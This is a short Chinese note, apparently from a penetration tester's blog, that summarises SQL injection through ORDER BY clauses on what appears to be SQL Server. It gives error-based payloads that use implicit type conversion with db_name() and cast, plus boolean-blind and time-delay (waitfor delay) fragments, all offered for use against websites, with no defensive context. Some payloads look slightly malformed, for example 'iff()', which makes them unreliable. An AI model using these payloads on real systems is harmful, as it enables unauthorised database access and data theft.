今天遇到个站，老实来说之前遇到过order by注入，但是一直没有一个好好的总结，其实理解起来也很简单。

这里先写结果，合理使用隐式转换

已知符合的字段名字 +或者-等操作运算符 数字*函数
例子: text-3*db_name()
同理的逻辑一样可得
(text%2bcast(db_name()as int))

如果是无回显

text-iff() 
这样构造布尔盲注
text-if(1)waitfor delay 5 --a
这样构造延时注入